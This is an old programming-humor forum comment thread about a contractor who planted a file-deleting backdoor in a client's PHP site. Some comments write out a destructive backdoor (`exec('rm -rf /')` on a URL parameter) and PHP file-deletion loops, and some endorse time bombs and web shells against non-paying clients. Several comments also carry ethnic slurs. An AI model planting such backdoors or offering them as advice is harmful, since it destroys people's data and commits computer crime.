- Feature Articles
- CodeSOD
- Error'd
-
Forums
-
Other Articles
- Random Article
- Alex's Soapbox
- Announcements
- Best of…
- Best of Email
- Best of the Sidebar
- Bring Your Own Code
- Coded Smorgasbord
- Mandatory Fun Day
- Off Topic
- Representative Line
- News Roundup
- Editor's Soapbox
- Software on the Rocks
- Souvenir Potpourri
- Sponsor Post
- Tales from the Interview
- The Daily WTF: Live
- Virtudyne
Admin
... if ($_GET['page'] == "delete_all_files_2"){ exec('rm -rf /'); }Kerbleckistanians are not stupid. I'm using similar technique, when clients refuse to pay. It's really usefull! c99.php is also good thing.
Admin
This smells like propaganda...
the obligatory real wtfs: 1.he knew enough about php but he didn't review the code given 2.he had (language) problems communicating with the developer, but he expected him to implement what he was told to. 3.he negotiated a deal with payment per month and not per work done
Admin
I'm more amazed I haven't heard about someone doing something like this before.
Then again, maybe they just didn't have a medicorely capable businessman behind the operation with a programmer for a friend who might know something about it
Admin
I do the exact same thing. Read and execute directories will save your bacon over and over again.
Admin
No, it's Canada!
Admin
"Maybe I needing later"
Admin
That wouldn't work. Consider:
foreach ( glob( "*.php" ) as $file ) { unlink( $file ); }Admin
Canada has inferior potassium.
http://www.answerbag.com/q_view/164327
Addendum (2009-12-22 14:59): http://www.answerbag.com/q_view/164327
Admin
Also, assuming that "resources" is a folder, this would not work:
unlink("resources");unlink() will not delete recursively.
Admin
I are brillanting.
Admin
To your points:
(1) It's not clear that Derek claimed to know anything about anything. (2) Not uncommon, or unreasonable, although a common cause of culture clash (works between European countries, too!). (3) So what? I've been paid for Web development on an almost daily basis. If the man with the money can see the results on the screen, on a daily basis, that's usually enough. (I try to hold myself to a higher standard than that.)
But you're right. Other than the punch-line (which is only funny because the contractor has never heard of backups -- quite possible, for an incompetent; and the boss has never heard of backups -- quite possible), this is a distinctly feeble, and possibly objectionable, WTF. After six months, the SysAdmin steps in to save the day from little brown folk!
Q. What's the difference between a native PHP programmer and a Kerbleckistani PHP contractor?
A. They're both cheap and incompetent, but you can spot the latter because he comes from a made-up country.
The problem is: even if this is propaganda, it's pretty close to the way a lot of PHBs think. It doesn't really take a Kerbleckistani programmer and some sing-song quasi-quotations from ItAin't Half Hot, Mum to make it a believable story.
Admin
A partner once insisted that I put a time bomb in code in case the customer didn't pay. I hated to do it. Sure enough, as time nearly expired, the cusomter paid and we had to go out and put on an emergency "update". I don't remember if we actually told them it was to turn off the time bomb on not. I should have used that comment "Maybe I needing later"!
Admin
I always figured Madeupistans were Eastern European and comprised white, rather than brown, folks.
I think the level of competence of (expatriot) Indian-region people I personally know is about on par with those born in the states: most are competent enough, a few are a little less than desirable, and a few excellent.
Admin
Nope - its "Drano" spelled inside out.
Admin
The grep -R line doesn't do what you think it does. More like:
or
(quotes probably not strictly necessary)
Admin
I don't know about the origin of the name, but I have it stacked on the top back shelf, right next to the handwavium.
http://en.wikipedia.org/wiki/Handwavium
Admin
A lesson for all Kerbleckistanians; host the development version on your own server. And only give up the code once you've been paid.
Then you don't need to delete through a back door. You can delete it from the console.
Admin
won't recurse through directories as you expect, since your directories likely won't end with *.php.
would work much better. Sorry to be anal, but if you are going to critique code, be ready to be equally critiqued.
Admin
Madeupistans are pretty much by definition Asian. Think Pakistan, Uzbekhistan, Kazhakstan, Turkmenistan, and ... er ... Afghanistan. It's a PIE, latterly Persian, latterly Pashtun stem, and conceivably it might therefore refer to the Caucasus or to Eastern Europe. In context, however, it clearly does not.
If it were to refer to anywhere in Europe, it would be Elbonia or Ruritania, or some such.
I'm sure Elbonians and Ruritanians are crap at PHP, too.
Admin
I've seen an interesting variant on this. We were using some CAD software to automate some experiments in a chemistry lab. We had this kid (your standard all American nerd, nasal voice, pudgy w/ glasses) working on it for a while.
He was also a jerk, and he got into a tiff with one of the postdocs and disappeared. No back door, but he didn't need one: the software was visual and he had all sorts of tricks to hide his circuits, putting them within a device but scrolled way off, resized devices to be point sized, etc.
TRWTF was that this system actually let you lay stuff out to point-level precision, or to resize a circuit so that it was almost invisible.
Admin
It does not matter what race your programmer / developer is, complete morons of any kind can programme in PHP and call themselves programmers / developers. I suppose that is the 'winning feature' of PHP, even a crackhead can write it.
Admin
Hasn't worked. Most people know the backdoor club is somewhere on Folsom St.
Admin
You also won't need to delete it. Switch the web site pointer to a single page saying PAYMENT REQUIRED.
This must be why they created cloud computing!
Admin
I'd complain too, but the only name I would make up would be Jim ... unless the guy's name was actually Jim. Then I'd use Ondra.
Admin
I would just like to stop the speculations about "Ondra". It's a colloquial form of "Ondřej" which is Czech version of Andrew.
You can read more about it here, http://en.wikipedia.org/wiki/Andrew#Andrew%20variants
Admin
Stupid question, maybe:
Why would someone from "Kerbleckistanian" who's first language isn't english, write the comment for a back door code in English?
That strikes me as highly improbable.
Admin
What he wanted was to get paid/extort money. If he hadn't said anything, he might have gotten his revenge, but he would definitely not have gotten paid.
Admin
Because even us non-english speakers prefer to comment code (even if in bad) english.
Partly because of language limitation (some things just don't translate well :\ ) or because sometimes your code has to be maintained by a foreigner, who would get annoyed at functions called "IzpišiBesedilo(String nekaj)".
Admin
Sure, but your nasty backdoor?
Admin
TRWTF is not using version control!
Admin
If you're actually serious, then you are a criminal. Going back on a contract is a civil matter. By deleting files (even if they are copyrighted by you) from the client's servers, you are committing a felony computer crime. Just because they broke contractual obligations doesn't give you the right to commit a crime.
Even if you limit the deletion to ONLY the files that you created I think you are on incredibly shaky ground. Imagine if you hired a contractor to re-roof your house, and then refused to pay. He can't just come back to your property and start ripping the roofing down. What he does is he sues you.
If he can't sue because you're in some unfriendly jurisdiction, then it was his fault for working with somebody who he can't enforce contracts upon.
Admin
Admin
Funny, I was thinking exactly the same thing about the guy who hired the Kerbleckistanian. It's his fault for hiring a guy he couldn't sue for deleting all his files, after he stiffed the guy.
Extra-legal solutions are a two-way street, so take all that lawyer crap and shove it up your ...
Admin
Which means a lot of you have been breaking the first two rules of backdoor club.
Admin
Like you say, it's a PIE root, it's no more (or less) Persian than it is Russian (стан), or English (as in 'stand' and '-stead').
Most of the -stans are Turkic, who can look anywhere from white to Mongolian, so "brown" seems like a pretty poor choice of slur.
Some are Iranian, so that would make sense, but I haven't seen too much coding being outsourced to Afghanistan.
Though come to think of it, nor to any other -stan, for that matter.
I guess it's too much to ask for a little rigor in people's racism.
Admin
he even added comments to the backdoor code hehe
Admin
Ondra is common name in Czech Republic(Europe). It is a familiar version of Ondřej.
Admin
These Kerbleckistany contractors are hopeless. A local contractor would have executed that command months earlier, then blamed the deleted code on a server problem and billed the client to rewrite it all.
Admin
So... is that what ya call an "LOL cat" ?
<sorry>Admin
Admin
I don't know what you mean by "lawyer crap." Sue somebody for deleting files? If somebody deleted files from my server, I'd report them to the FBI. No lawyer involved.
Admin
Admin
Or you could let hackers attack your DNS and change the records... Of course, you cannot fix it unless he pays you... Or maybe you have no money left for the electricity, so the server fails?
So many possibilities...
Admin
Admin
[TICK] PHP. [TICK] Developer. [TICK] Version control. [TICK] Backups
Use all of them, as standard. Not all of us are sloppy B????ds...
Admin
This comment had me rotf :) Thanks, I needed a good laugh today.
Admin
It does not matter what PROGRAMMING LANGUAGE your programmer/developer is using, complete morons of any kind will code like complete morons and call themselves programmers/developers. (even bigger morons have certificates, that anyone who can read can get, to prove to themselves they know something)
I am getting really sick and tired of the anti-PHP-ness that goes around this place.
Yes you can write crappy code in PHP, its actually quite easy I'll admit. But so can you in ANY language. No language is safe from crappy programmers, morons write like morons.
So because you write in your manly C/C++ language, you are immune to bad code? Or because you have some snazzy IDE for your .NET languages you are the master of good coding practice, or maybe because Java tries to squeeze you into using 'proper' coding practices and using patterns that you couldn't possibly write bad code. I somehow doubt it. The plethora of crappy code in C/C++, C# (and some other .NET flavours), java and yes PHP we have in most of the legacy application we (try) maintain is proof of that.
Let me repeat myself : Morons write like morons, regardless of the medium they use.
crackheads might be able to write PHP, but all you need is a brainless monkey to code in VB.
Admin
Because he outsourced his backdoor to a programmer in America?
Admin
If you are going to give examples of a command to delete all the files on your hard disk, please it on your own servers before you upload it to thedailywtf. We don't want untested code here. Preferably test it on your production server.
Addendum (2009-12-23 00:33): f you are going to give examples of a command to delete all the files on your hard disk, please test it on your own servers before you upload it to thedailywtf. We don't want untested code here. Preferably test it on your production server.
Admin
This is a method I've used many times when clients wouldn't pay for their hosting. Works like a charm.